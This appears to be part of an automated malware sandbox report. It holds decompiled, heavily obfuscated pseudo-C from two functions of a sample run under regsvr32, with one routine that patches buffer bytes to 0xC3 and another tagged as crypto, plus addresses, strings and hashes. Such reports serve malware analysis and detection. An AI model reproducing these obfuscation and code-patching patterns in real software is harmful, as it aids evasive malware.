				intOrPtr _t469;
				void* _t475;
				intOrPtr* _t477;
				void* _t479;
				signed int _t492;
				signed char* _t519;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed char* _t532;
				intOrPtr _t533;
				intOrPtr _t534;
				void* _t535;
				signed char* _t536;
				intOrPtr* _t537;
				signed int* _t539;
				signed int* _t541;
				void* _t543;

				_t477 = _a12;
				_push(_t477);
				_push(_a8);
				_t533 = __edx;
				_t537 = __ecx;
				_push(_a4);
				_v104 = __edx;
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t410);
				_v48 = 0xc2c967;
				_v108 = _v108 & 0x00000000;
				asm("stosd");
				_t539 =  &(( &_v288)[5]);
				_t479 = 0x2d8a01e;
				asm("stosd");
				asm("stosd");
				_v268 = 0x13192e;
				_v268 = _v268 >> 0xe;
				_t522 = 0x7a;
				_v268 = _v268 / _t522;
				_v268 = _v268 ^ 0xa67107cf;
				_v268 = _v268 ^ 0xa67107cf;
				_v180 = 0x822106;
				_v180 = _v180 ^ 0x7b43f696;
				_v180 = _v180 ^ 0xd3ff461a;
				_v180 = _v180 ^ 0xa83e91ca;
				_v260 = 0xfc96b3;
				_v260 = _v260 ^ 0x88d779ee;
				_v260 = _v260 | 0x0ca97313;
				_v260 = _v260 ^ 0xca187f30;
				_v260 = _v260 ^ 0x46b3802f;
				_v288 = 0x4333cc;
				_v288 = _v288 << 0xf;
				_t523 = 0x34;
				_v288 = _v288 / _t523;
				_v288 = _v288 >> 3;
				_v288 = _v288 ^ 0x005b8977;
				_v136 = 0xc5dc93;
				_v136 = _v136 * 0xc;
				_v136 = _v136 ^ 0x0945f62e;
				_v128 = 0x6b700a;
				_t57 =  &_v128; // 0x6b700a
				_v128 =  *_t57 * 0x15;
				_v128 = _v128 ^ 0x08d49145;
				_v232 = 0xf79846;
				_v232 = _v232 ^ 0xca57ef9e;
				_v232 = _v232 ^ 0x925d174a;
				_v232 = _v232 ^ 0x58faffd4;
				_v280 = 0xd1aac6;
				_v280 = _v280 >> 0xc;
				_v280 = _v280 >> 3;
				_v280 = _v280 | 0xe15f3d77;
				_v280 = _v280 ^ 0xe1581caf;
				_v204 = 0x586478;
				_v204 = _v204 << 6;
				_v204 = _v204 * 0x45;
				_v204 = _v204 ^ 0xf4c06de0;
				_v236 = 0x7a6b49;
				_v236 = _v236 + 0xfffff53d;
				_v236 = _v236 + 0xffff6bfb;
				_v236 = _v236 ^ 0x00796dc4;
				_v164 = 0x73b924;
				_v164 = _v164 * 0x37;
				_v164 = _v164 ^ 0x18d89939;
				_v140 = 0xd61f2b;
				_v140 = _v140 | 0xe12df20d;
				_v140 = _v140 ^ 0xe1fed234;
				_v264 = 0xb74ee;
				_v264 = _v264 | 0x369c0611;
				_v264 = _v264 + 0xffffce97;
				_v264 = _v264 | 0x56131c90;
				_v264 = _v264 ^ 0x76993c7a;
				_v188 = 0x86359d;
				_v188 = _v188 | 0xee9d04be;
				_v188 = _v188 >> 7;
				_v188 = _v188 ^ 0x01d63d7e;
				_v196 = 0x62a6bf;
				_v196 = _v196 ^ 0x13f7b83b;
				_v196 = _v196 | 0xfa5dbf29;
				_v196 = _v196 ^ 0xfbd613bb;
				_v272 = 0x497fb9;
				_v272 = _v272 >> 8;
				_v272 = _v272 + 0x46f;
				_t524 = 0x15;
				_v272 = _v272 / _t524;
				_v272 = _v272 ^ 0x0006a64c;
				_v284 = 0x22ff47;
				_v284 = _v284 << 9;
				_v284 = _v284 + 0x2a7e;
				_v284 = _v284 | 0xa3b8d71b;
				_v284 = _v284 ^ 0xe7f75fc1;
				_v168 = 0x5effde;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0xdff336ff;
				_v160 = 0x143f18;
				_v160 = _v160 >> 8;
				_v160 = _v160 ^ 0x00026d5e;
				_v212 = 0x56f8ef;
				_t525 = 0x74;
				_v212 = _v212 / _t525;
				_v212 = _v212 >> 1;
				_v212 = _v212 ^ 0x00041781;
				_v184 = 0x78f661;
				_t526 = 0x24;
				_v184 = _v184 / _t526;
				_v184 = _v184 << 6;
				_v184 = _v184 ^ 0x00d4b0ae;
				_v132 = 0xfc57e1;
				_v132 = _v132 + 0x95ac;
				_v132 = _v132 ^ 0x00fd4e4f;
				_v224 = 0x75249d;
				_v224 = _v224 >> 2;
				_v224 = _v224 << 5;
				_v224 = _v224 ^ 0x03a0d1e2;
				_v200 = 0x1dd68f;
				_t527 = 0x1e;
				_v200 = _v200 / _t527;
				_v200 = _v200 << 5;
				_v200 = _v200 ^ 0x001cc6a7;
				_v192 = 0xfcdaf1;
				_v192 = _v192 + 0xd795;
				_v192 = _v192 >> 9;
				_v192 = _v192 ^ 0x00058c90;
				_v216 = 0xbb9259;
				_t528 = 0x34;
				_v216 = _v216 / _t528;
				_t529 = 0x52;
				_v216 = _v216 * 0x13;
				_v216 = _v216 ^ 0x004a95ed;
				_v276 = 0x57a41b;
				_v276 = _v276 ^ 0xd020dbe5;
				_v276 = _v276 | 0x8ab5e016;
				_v276 = _v276 + 0xffff22d9;
				_v276 = _v276 ^ 0xdaf55aee;
				_v244 = 0x1f39e;
				_v244 = _v244 >> 7;
				_v244 = _v244 | 0x3f4cee99;
				_v244 = _v244 / _t529;
				_v244 = _v244 ^ 0x00c55e53;
				_v208 = 0x8cb9ec;
				_v208 = _v208 ^ 0x591dda69;
				_v208 = _v208 + 0xffff44b3;
				_v208 = _v208 ^ 0x5993fa0d;
				_v152 = 0xb0343f;
				_v152 = _v152 << 0xf;
				_v152 = _v152 ^ 0x1a1cc008;
				_v252 = 0xe1a21c;
				_v252 = _v252 | 0x952b17c7;
				_v252 = _v252 >> 0xb;
				_v252 = _v252 + 0x3107;
				_v252 = _v252 ^ 0x00168178;
				_v176 = 0x1f45f4;
				_v176 = _v176 + 0xffffb6c3;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x000294fa;
				_v144 = 0xd98b7;
				_v144 = _v144 + 0xdfca;
				_v144 = _v144 ^ 0x00064cf8;
				_v124 = 0xf97c3c;
				_v124 = _v124 << 0xe;
				_v124 = _v124 ^ 0x5f01afd1;
				_v220 = 0xbf67e3;
				_v220 = _v220 >> 0xf;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x0002d002;
				_v148 = 0xfa1be7;
				_v148 = _v148 * 0x4c;
				_v148 = _v148 ^ 0x4a419838;
				_v228 = 0xe7473d;
				_v228 = _v228 + 0x3507;
				_v228 = _v228 ^ 0x00ead38c;
				_v156 = 0x66a8ab;
				_v156 = _v156 | 0x79d54c9c;
				_v156 = _v156 ^ 0x79fe3884;
				_v240 = 0x18be1a;
				_v240 = _v240 ^ 0x7e543587;
				_v240 = _v240 * 0x68;
				_v240 = _v240 | 0xe3fcfdd3;
				_v240 = _v240 ^ 0xeff94d70;
				_v172 = 0x9913c4;
				_v172 = _v172 * 0x77;
				_v172 = _v172 + 0xffffc63d;
				_v172 = _v172 ^ 0x47206855;
				_v248 = 0xd44183;
				_v248 = _v248 + 0xd298;
				_v248 = _v248 << 4;
				_v248 = _v248 ^ 0x50766a5f;
				_v248 = _v248 ^ 0x5d272bff;
				_v256 = 0x31eb30;
				_v256 = _v256 ^ 0xb25f58d4;
				_v256 = _v256 ^ 0x46bb6998;
				_t530 = 0x74;
				_v256 = _v256 / _t530;
				_v256 = _v256 ^ 0x021c5309;
				while(1) {
					L1:
					_t531 = _v120;
					goto L2;
					do {
						while(1) {
							L2:
							_t543 = _t479 - 0x3286a26;
							if(_t543 > 0) {
								break;
							}
							if(_t543 == 0) {
								E040F2B09(_v220, _v116, _v148, _v228);
								_t479 = 0x483cb7c;
								continue;
							}
							if(_t479 == 0xd18f0a) {
								_t455 = E040D57B8( *_t477, _v288, _v136,  *((intOrPtr*)(_t477 + 4)), _v128,  &_v32, _v232);
								_t539 =  &(_t539[6]);
								if(_t455 == 0) {
									L33:
									return _v108;
								}
								_t479 = 0x98446cf;
								continue;
							}
							if(_t479 == 0x2686f46) {
								_t534 =  *_t537;
								E040D5026(_v184, _v132, _v224, _t534, _v200);
								_t535 = _t534 + _v260;
								E040EC9B0(_v192, _t535, _v216, _v112, _v116, _v276);
								_push(_v152);
								_t536 = _t535 + _v112;
								_t492 = _t531;
								_push(_v208);
								_push(_t536);
								E040D71B3(_t492, _v244);
								_t532 =  &(_t536[_t531]);
								_t541 =  &(_t539[0xa]);
								_t519 = _t536;
								if(_t536 >= _t532) {
									L16:
									_push(_t492);
									_push(_t492);
									_t464 = E040ECCA0(0, 0xe);
									_t539 =  &(_t541[4]);
									_t479 = 0x3286a26;
									 *((char*)(_t464 + _t536)) = 0;
									_t533 = _v104;
									goto L1;
								} else {
									goto L13;
								}
								do {
									L13:
									_t492 = _v268;
									if(( *_t519 & 0x000000ff) == _t492) {
										 *_t519 = 0xc3;
									}
									_t519 =  &(_t519[1]);
								} while (_t519 < _t532);
								goto L16;
							}
							if(_t479 == 0x2d8a01e) {
								_t479 = 0xd18f0a;
								continue;
							}
							if(_t479 != 0x3056d50) {
								goto L30;
							}
							_push(_t479);
							_push(_t479);
							_t469 = E040DC5D8(_a4);
							_t539 =  &(_t539[3]);
							 *_t537 = _t469;
							if(_t469 == 0) {
								_t479 = 0x3286a26;
							} else {
								_v108 = 1;
								_t479 = 0x2686f46;
							}
						}
						if(_t479 == 0x34d1508) {
							if(E040DFB8E(_v164,  &_v100,  &_v116, _v140) == 0) {
								_t479 = 0x483cb7c;
								goto L30;
							}
							_t479 = 0x5c08967;
							goto L2;
						}
						if(_t479 == 0x483cb7c) {
							E040F2B09(_v156, _v100, _v240, _v172);
							goto L33;
						}
						if(_t479 == 0x5c08967) {
							_push(_t479);
							_push(_t479);
							_t531 = E040ECCA0(_v248, _v256);
							_t539 =  &(_t539[4]);
							_t479 = 0x3056d50;
							_v120 = _t531;
							_a4 = _v180 + _t531 + _v112;
							goto L2;
						}
						if(_t479 != 0x98446cf) {
							goto L30;
						}
						_v92 =  &_v32;
						_v68 =  *_t477;
						_v64 =  *((intOrPtr*)(_t477 + 4));
						_v60 = _t533;
						_v88 = 0x20;
						_t475 = E040DE7DE(_v280, _v204,  &_v92,  &_v100, _v236);
						_t539 =  &(_t539[3]);
						if(_t475 == 0) {
							goto L33;
						}
						_t479 = 0x34d1508;
						goto L2;
						L30:
					} while (_t479 != 0x5241bf8);
					goto L33;
				}
			}

0x040e5780
0x040e578a
0x040e578b
0x040e5792
0x040e5794
0x040e5796
0x040e579d
0x040e57a4
0x040e57a5
0x040e57a6
0x040e57ab
0x040e57bf
0x040e57c7
0x040e57c8
0x040e57cd
0x040e57d2
0x040e57d5
0x040e57d6
0x040e57de
0x040e57e7
0x040e57ec
0x040e57f7
0x040e57fb
0x040e57ff
0x040e580a
0x040e5815
0x040e5820
0x040e582b
0x040e5833
0x040e583b
0x040e5843
0x040e584b
0x040e5853
0x040e585b
0x040e5864
0x040e5867
0x040e586b
0x040e5870
0x040e5878
0x040e588b
0x040e5892
0x040e589d
0x040e58a8
0x040e58b0
0x040e58b7
0x040e58c2
0x040e58ca
0x040e58d2
0x040e58da
0x040e58e2
0x040e58ea
0x040e58ef
0x040e58f4
0x040e58fc
0x040e5904
0x040e590c
0x040e5916
0x040e591a
0x040e5922
0x040e592a
0x040e5932
0x040e593a
0x040e5942
0x040e5955
0x040e595e
0x040e5969
0x040e5974
0x040e597f
0x040e598a
0x040e5992
0x040e599a
0x040e59a2
0x040e59aa
0x040e59b2
0x040e59ba
0x040e59c2
0x040e59c7
0x040e59cf
0x040e59d7
0x040e59df
0x040e59e7
0x040e59ef
0x040e59f7
0x040e59fc
0x040e5a0a
0x040e5a0f
0x040e5a15
0x040e5a1d
0x040e5a25
0x040e5a2a
0x040e5a32
0x040e5a3a
0x040e5a42
0x040e5a4d
0x040e5a55
0x040e5a60
0x040e5a6b
0x040e5a73
0x040e5a7e
0x040e5a8a
0x040e5a8f
0x040e5a95
0x040e5a99
0x040e5aa1
0x040e5aad
0x040e5ab2
0x040e5ab8
0x040e5abd
0x040e5ac5
0x040e5ad0
0x040e5adb
0x040e5ae6
0x040e5aee
0x040e5af3
0x040e5af8
0x040e5b00
0x040e5b0c
0x040e5b11
0x040e5b15
0x040e5b1a
0x040e5b22
0x040e5b2a
0x040e5b32
0x040e5b37
0x040e5b41
0x040e5b4d
0x040e5b52
0x040e5b5d
0x040e5b60
0x040e5b64
0x040e5b6c
0x040e5b74
0x040e5b7c
0x040e5b84
0x040e5b8c
0x040e5b94
0x040e5b9c
0x040e5ba1
0x040e5baf
0x040e5bb3
0x040e5bbb
0x040e5bc3
0x040e5bcb
0x040e5bd3
0x040e5bdb
0x040e5be6
0x040e5bee
0x040e5bf9
0x040e5c01
0x040e5c09
0x040e5c0e
0x040e5c16
0x040e5c1e
0x040e5c29
0x040e5c34
0x040e5c3c
0x040e5c47
0x040e5c52
0x040e5c5d
0x040e5c68
0x040e5c73
0x040e5c7b
0x040e5c86
0x040e5c8e
0x040e5c93
0x040e5c98
0x040e5ca0
0x040e5cb3
0x040e5cba
0x040e5cc5
0x040e5ccd
0x040e5cdd
0x040e5ce5
0x040e5cf0
0x040e5cfb
0x040e5d06
0x040e5d0e
0x040e5d1b
0x040e5d1f
0x040e5d27
0x040e5d2f
0x040e5d42
0x040e5d49
0x040e5d54
0x040e5d5f
0x040e5d67
0x040e5d6f
0x040e5d74
0x040e5d7c
0x040e5d84
0x040e5d8c
0x040e5d94
0x040e5da2
0x040e5da5
0x040e5da9
0x040e5db1
0x040e5db1
0x040e5db1
0x040e5db1
0x040e5db8
0x040e5db8
0x040e5db8
0x040e5db8
0x040e5dbe
0x00000000
0x00000000
0x040e5dc4
0x040e5f56
0x040e5f5d
0x00000000
0x040e5f5d
0x040e5dd0
0x040e5f26
0x040e5f2b
0x040e5f30
0x040e60a6
0x040e60b7
0x040e60b7
0x040e5f36
0x00000000
0x040e5f36
0x040e5ddc
0x040e5e43
0x040e5e59
0x040e5e65
0x040e5e86
0x040e5e8b
0x040e5e92
0x040e5e99
0x040e5e9b
0x040e5ea3
0x040e5ea4
0x040e5ea9
0x040e5eab
0x040e5eae
0x040e5eb2
0x040e5ec7
0x040e5ee0
0x040e5ee1
0x040e5ee6
0x040e5eeb
0x040e5eee
0x040e5ef3
0x040e5ef7
0x00000000
0x00000000
0x00000000
0x00000000
0x040e5eb4
0x040e5eb4
0x040e5eb4
0x040e5ebd
0x040e5ebf
0x040e5ebf
0x040e5ec2
0x040e5ec3
0x00000000
0x040e5eb4
0x040e5de4
0x040e5e35
0x00000000
0x040e5e35
0x040e5dec
0x00000000
0x00000000
0x040e5e08
0x040e5e09
0x040e5e0d
0x040e5e12
0x040e5e15
0x040e5e1a
0x040e5e2e
0x040e5e1c
0x040e5e1c
0x040e5e27
0x040e5e27
0x040e5e1a
0x040e5f6d
0x040e6067
0x040e6073
0x00000000
0x040e6073
0x040e6069
0x00000000
0x040e6069
0x040e5f79
0x040e609f
0x00000000
0x040e60a5
0x040e5f85
0x040e600c
0x040e600d
0x040e601b
0x040e601d
0x040e6024
0x040e602b
0x040e6039
0x00000000
0x040e6039
0x040e5f8d
0x00000000
0x00000000
0x040e5fa6
0x040e5faf
0x040e5fb9
0x040e5fcf
0x040e5fd7
0x040e5fe2
0x040e5fe7
0x040e5fec
0x00000000
0x00000000
0x040e5ff2
0x00000000
0x040e6078
0x040e6078
0x00000000
0x040e6084

Strings

, xrefs: 040E5FD7
Uh G, xrefs: 040E5D54
=G, xrefs: 040E5CC5
pk, xrefs: 040E58A8
_jvP, xrefs: 040E5D74
xdX, xrefs: 040E5904
Ikz, xrefs: 040E5922
01, xrefs: 040E5D84
w=_, xrefs: 040E58F4
~*, xrefs: 040E5A2A

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: pk$ $01$=G$Ikz$Uh G$_jvP$w=_$xdX$~*
API String ID: 0-1860247402
Opcode ID: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
Instruction ID: 028e68782722adde00beac6573b09cf366997eef1aa88adcb7e39e8ba9732f3b
Opcode Fuzzy Hash: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
Instruction Fuzzy Hash: A12223711083809FD3A8CF65C589A9FBBE2BFC5708F10891DE6DA96260D7B19958CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040E7D5B, Relevance: 12.9, Strings: 10, Instructions: 361
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E040E7D5B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t420;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t488;
				void* _t489;
				signed int* _t493;

				_t493 =  &_v2792;
				_v2792 = 0x289571;
				_v2792 = _v2792 | 0xf6df9bca;
				_v2792 = _v2792 + 0xea43;
				_v2792 = _v2792 ^ 0xf7008a17;
				_v2788 = 0xdb8a78;
				_v2788 = _v2788 * 6;
				_t488 = __ecx;
				_t489 = 0x219adc7;
				_t442 = 0x7a;
				_v2788 = _v2788 / _t442;
				_t443 = 0x42;
				_v2788 = _v2788 * 0x3d;
				_v2788 = _v2788 ^ 0x0296dfb6;
				_v2660 = 0xc0a6c5;
				_v2660 = _v2660 << 6;
				_v2660 = _v2660 ^ 0x3025665c;
				_v2692 = 0x3a8fa3;
				_v2692 = _v2692 ^ 0xa120b079;
				_v2692 = _v2692 | 0x9ac88514;
				_v2692 = _v2692 ^ 0xbbd9167d;
				_v2668 = 0xec1a87;
				_v2668 = _v2668 + 0x8cab;
				_v2668 = _v2668 ^ 0x00e348c2;
				_v2628 = 0xecd9a9;
				_v2628 = _v2628 << 9;
				_v2628 = _v2628 ^ 0xd9bcc0eb;
				_v2756 = 0xbae8da;
				_v2756 = _v2756 + 0xefc;
				_v2756 = _v2756 * 0x2c;
				_v2756 = _v2756 ^ 0x76eb1803;
				_v2756 = _v2756 ^ 0x56c3d905;
				_v2780 = 0x787147;
				_v2780 = _v2780 + 0xffff6597;
				_v2780 = _v2780 + 0xffffc18b;
				_v2780 = _v2780 | 0x826dfd4e;
				_v2780 = _v2780 ^ 0x827371e5;
				_v2712 = 0x74bd84;
				_v2712 = _v2712 >> 9;
				_v2712 = _v2712 + 0xbcb6;
				_v2712 = _v2712 ^ 0x0001f6d9;
				_v2680 = 0x714a85;
				_v2680 = _v2680 | 0x3dc400c8;
				_v2680 = _v2680 ^ 0x3df5425d;
				_v2612 = 0xace488;
				_v2612 = _v2612 | 0xd2617c07;
				_v2612 = _v2612 ^ 0xd2e83d7d;
				_v2736 = 0x9a08fa;
				_v2736 = _v2736 + 0x9c03;
				_v2736 = _v2736 << 5;
				_v2736 = _v2736 ^ 0x135d006f;
				_v2652 = 0x41ccd2;
				_v2652 = _v2652 ^ 0x97b2ef27;
				_v2652 = _v2652 ^ 0x97fb61bc;
				_v2764 = 0x9e119e;
				_v2764 = _v2764 << 2;
				_v2764 = _v2764 | 0x268f2d0f;
				_v2764 = _v2764 / _t443;
				_v2764 = _v2764 ^ 0x009ccc86;
				_v2620 = 0x8f6e28;
				_v2620 = _v2620 >> 3;
				_v2620 = _v2620 ^ 0x00104951;
				_v2772 = 0xe21e14;
				_v2772 = _v2772 + 0xffff5b09;
				_v2772 = _v2772 * 0x18;
				_v2772 = _v2772 + 0xc00a;
				_v2772 = _v2772 ^ 0x152b5515;
				_v2608 = 0x3d3ea7;
				_v2608 = _v2608 + 0x63eb;
				_v2608 = _v2608 ^ 0x0030ec7d;
				_v2644 = 0x866304;
				_v2644 = _v2644 + 0x379c;
				_v2644 = _v2644 ^ 0x008e4788;
				_v2604 = 0xe77a6a;
				_t121 =  &_v2604; // 0xe77a6a
				_t444 = 0x63;
				_v2604 =  *_t121 / _t444;
				_v2604 = _v2604 ^ 0x000e0408;
				_v2696 = 0xf5199c;
				_v2696 = _v2696 << 8;
				_v2696 = _v2696 << 3;
				_v2696 = _v2696 ^ 0xa8c2da1f;
				_v2636 = 0xbfea70;
				_v2636 = _v2636 | 0x60f37e4e;
				_v2636 = _v2636 ^ 0x60f450e6;
				_v2720 = 0x6acbb3;
				_t445 = 0x6c;
				_v2720 = _v2720 / _t445;
				_v2720 = _v2720 >> 9;
				_v2720 = _v2720 ^ 0x00013488;
				_v2704 = 0x72224f;
				_v2704 = _v2704 << 9;
				_v2704 = _v2704 + 0xffff0fb2;
				_v2704 = _v2704 ^ 0xe44ad0e5;
				_v2728 = 0xe68b79;
				_v2728 = _v2728 | 0x8e61462a;
				_v2728 = _v2728 >> 1;
				_v2728 = _v2728 ^ 0x477bf727;
				_v2616 = 0x4099b0;
				_v2616 = _v2616 + 0xfa8f;
				_v2616 = _v2616 ^ 0x0048c0a5;
				_v2688 = 0xff8ffd;
				_v2688 = _v2688 ^ 0x53972d47;
				_t446 = 0x60;
				_v2688 = _v2688 / _t446;
				_v2688 = _v2688 ^ 0x00dac0dc;
				_v2744 = 0xc2c855;
				_v2744 = _v2744 | 0x821d7436;
				_t447 = 0x65;
				_v2744 = _v2744 * 0x46;
				_v2744 = _v2744 ^ 0xc93dde39;
				_v2664 = 0x8fcf69;
				_v2664 = _v2664 ^ 0x92a1f028;
				_v2664 = _v2664 ^ 0x922e5d56;
				_v2672 = 0x138bb7;
				_v2672 = _v2672 + 0xffff6c98;
				_v2672 = _v2672 ^ 0x001bead2;
				_v2784 = 0x1d404b;
				_v2784 = _v2784 ^ 0xbb38c348;
				_v2784 = _v2784 >> 0xb;
				_v2784 = _v2784 | 0xeccea58e;
				_v2784 = _v2784 ^ 0xecdc694e;
				_v2676 = 0xbdcffc;
				_v2676 = _v2676 ^ 0x5aef785e;
				_v2676 = _v2676 ^ 0x5a57f2e1;
				_v2768 = 0xceb2dd;
				_v2768 = _v2768 | 0xafbcd5ba;
				_v2768 = _v2768 * 0xf;
				_v2768 = _v2768 / _t447;
				_v2768 = _v2768 ^ 0x00c1507c;
				_v2732 = 0xba5c67;
				_v2732 = _v2732 + 0xffff3085;
				_v2732 = _v2732 ^ 0x29fec498;
				_v2732 = _v2732 ^ 0x29414316;
				_v2740 = 0xfebc70;
				_v2740 = _v2740 >> 6;
				_t448 = 0x4c;
				_v2740 = _v2740 * 0x46;
				_v2740 = _v2740 ^ 0x01107382;
				_v2776 = 0x1fdbbd;
				_v2776 = _v2776 + 0xffff7a05;
				_v2776 = _v2776 << 5;
				_v2776 = _v2776 + 0xffff7a3d;
				_v2776 = _v2776 ^ 0x03eed3d9;
				_v2708 = 0xe5e896;
				_v2708 = _v2708 << 6;
				_v2708 = _v2708 + 0x807d;
				_v2708 = _v2708 ^ 0x3973facc;
				_v2716 = 0xdc1d9;
				_v2716 = _v2716 | 0xfc1937aa;
				_v2716 = _v2716 + 0xffffd03c;
				_v2716 = _v2716 ^ 0xfc1f97ce;
				_v2648 = 0xeb72b6;
				_v2648 = _v2648 >> 8;
				_v2648 = _v2648 ^ 0x0003133b;
				_v2724 = 0x35c70c;
				_v2724 = _v2724 + 0xffff3120;
				_v2724 = _v2724 + 0xda65;
				_v2724 = _v2724 ^ 0x003bd395;
				_v2656 = 0x588c44;
				_v2656 = _v2656 ^ 0x3c8fee8a;
				_v2656 = _v2656 ^ 0x3cdfb996;
				_v2632 = 0xa98095;
				_v2632 = _v2632 + 0xf08e;
				_v2632 = _v2632 ^ 0x00ab49e1;
				_v2640 = 0x908171;
				_v2640 = _v2640 << 0xa;
				_v2640 = _v2640 ^ 0x42069508;
				_v2748 = 0xf99537;
				_v2748 = _v2748 >> 9;
				_v2748 = _v2748 | 0x4d3f7029;
				_v2748 = _v2748 ^ 0x4d356fb4;
				_v2700 = 0xf7c115;
				_v2700 = _v2700 + 0xffffc630;
				_v2700 = _v2700 >> 5;
				_v2700 = _v2700 ^ 0x0003a618;
				_v2624 = 0xf73d89;
				_v2624 = _v2624 * 0x3f;
				_v2624 = _v2624 ^ 0x3cd41ae8;
				_v2684 = 0x237d3e;
				_v2684 = _v2684 + 0xffff7bf2;
				_v2684 = _v2684 << 0xb;
				_v2684 = _v2684 ^ 0x17c7121d;
				_v2752 = 0x3823b3;
				_v2752 = _v2752 * 0x2a;
				_v2752 = _v2752 + 0xffff9ab5;
				_v2752 = _v2752 >> 9;
				_v2752 = _v2752 ^ 0x0000d6a9;
				_v2760 = 0x9d905;
				_t420 = _v2760 / _t448;
				_v2760 = _t420;
				_v2760 = _v2760 + 0xffff5226;
				_v2760 = _v2760 ^ 0x58f88d53;
				_v2760 = _v2760 ^ 0xa70b0c4e;
				while(_t489 != 0x219adc7) {
					if(_t489 == 0x472b880) {
						E040D1A34(_v2744,  &_v1040, _t448, _t448, _v2664, _v2672, _v2784, _t448, _v2792, _v2676);
						_push(_v2776);
						_push(_v2740);
						_push(_v2732);
						E040F2D0A(_v2716, __eflags,  &_v2080, _v2648, _v2724, _v2656, 0x40d196c,  &_v520,  &_v1040, E040EE1F8(0x40d196c, _v2768, __eflags));
						E040EFECB(_t422, _v2632, _v2640, _v2748, _v2700);
						__eflags = 0;
						return E040E85FF(_v2624, _v2684, 0, 0,  &_v520, 0, _v2752, 0, _v2760);
					}
					_t501 = _t489 - 0x6430241;
					if(_t489 != 0x6430241) {
						L7:
						__eflags = _t489 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t420;
						}
						L10:
						return _t420;
					}
					E040F0DB1(_v2788,  &_v2600, _t501, _v2660, _t448, _v2692);
					 *((short*)(E040E09DD(_v2668,  &_v2600, _v2628, _v2756))) = 0;
					E040DBAA9(_v2780, _v2712, _t501, _v2680, _v2612,  &_v1560);
					_push(_v2620);
					_push(_v2764);
					_push(_v2652);
					E040F2D0A(_v2608, _t501,  &_v1560, _v2644, _v2604, _v2696, 0x40d188c,  &_v2080,  &_v2600, E040EE1F8(0x40d188c, _v2736, _t501));
					E040EFECB(_t434, _v2636, _v2720, _v2704, _v2728);
					_t448 = _v2616;
					_t420 = E040DBFBE( &_v2080, _t488, _v2688);
					_t493 =  &(_t493[0x18]);
					if(_t420 != 0) {
						_t489 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t489 = 0x6430241;
				goto L7;
			}

0x040e7d5b
0x040e7d61
0x040e7d6a
0x040e7d71
0x040e7d78
0x040e7d7f
0x040e7d90
0x040e7d94
0x040e7d9a
0x040e7da1
0x040e7da6
0x040e7db1
0x040e7db2
0x040e7db6
0x040e7dbe
0x040e7dc9
0x040e7dd1
0x040e7ddc
0x040e7de4
0x040e7dec
0x040e7df4
0x040e7dfc
0x040e7e07
0x040e7e12
0x040e7e1d
0x040e7e28
0x040e7e30
0x040e7e3b
0x040e7e43
0x040e7e50
0x040e7e54
0x040e7e5c
0x040e7e64
0x040e7e6c
0x040e7e74
0x040e7e7c
0x040e7e84
0x040e7e8c
0x040e7e94
0x040e7e99
0x040e7ea1
0x040e7ea9
0x040e7eb4
0x040e7ebf
0x040e7eca
0x040e7ed5
0x040e7ee0
0x040e7eeb
0x040e7ef3
0x040e7efb
0x040e7f00
0x040e7f08
0x040e7f13
0x040e7f1e
0x040e7f29
0x040e7f31
0x040e7f36
0x040e7f44
0x040e7f48
0x040e7f50
0x040e7f5b
0x040e7f63
0x040e7f6e
0x040e7f76
0x040e7f83
0x040e7f87
0x040e7f8f
0x040e7f99
0x040e7fa4
0x040e7faf
0x040e7fba
0x040e7fc5
0x040e7fd0
0x040e7fdb
0x040e7fe6
0x040e7fef
0x040e7ff4
0x040e7ffd
0x040e8008
0x040e8010
0x040e8015
0x040e801a
0x040e8022
0x040e802d
0x040e8038
0x040e8043
0x040e804f
0x040e8054
0x040e805a
0x040e805f
0x040e8067
0x040e806f
0x040e8074
0x040e807c
0x040e8084
0x040e808c
0x040e8094
0x040e8098
0x040e80a0
0x040e80ab
0x040e80b6
0x040e80c1
0x040e80c9
0x040e80d5
0x040e80da
0x040e80e0
0x040e80e8
0x040e80f0
0x040e80fd
0x040e80fe
0x040e8102
0x040e810a
0x040e8115
0x040e8120
0x040e812b
0x040e8136
0x040e8141
0x040e814c
0x040e8154
0x040e815c
0x040e8161
0x040e8169
0x040e8171
0x040e817c
0x040e8187
0x040e8192
0x040e819a
0x040e81a7
0x040e81b1
0x040e81b5
0x040e81bd
0x040e81c7
